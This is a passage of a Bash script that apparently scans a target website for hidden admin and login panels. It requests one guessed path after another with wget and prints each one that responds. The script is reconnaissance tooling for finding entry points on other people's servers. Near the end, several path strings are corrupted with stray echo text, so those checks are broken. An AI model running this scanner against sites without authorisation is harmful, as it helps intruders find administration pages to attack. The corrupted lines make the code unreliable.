echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cPanel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cpanel_file"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/customer_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/database_administration"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/directadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/dir-login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/donos"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/edit"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ezsqliteadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fileadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fileadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fileadmin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/fileadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/formslogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/funcoes"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/globes_admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/home.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/hpwebjetadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/index.swf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Indy_admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/instadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/irc-macadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/irectadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/isadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/isadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/joomla/administrator"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/key"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/kpanel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/letmein.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/letmein.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/letmein"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/LiveUser_Admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log_in.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log_in.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log_in"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log-in.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.htm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log-in.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/log-in"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_adminasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_adminphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_db"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_out"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_outasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_outphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_userasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login_userphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login1"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login1asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login1php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginerror"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginflat"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginok"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login-redirect"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginsave"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginsuper"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginsuperasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/loginsuperphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/login-us"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/logo_sysadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/logout"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/logoutasp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/logoutphp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Lotus_Domino_Admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/macadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manage"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manage.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manage.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/management.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/management.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/management"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manager.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manager.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manager"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/manuallogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/member.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/member.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/member"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memberadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/members"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/members.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/members.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/membro"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/membros"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/memlogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/meta_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.html"
c=$b$d
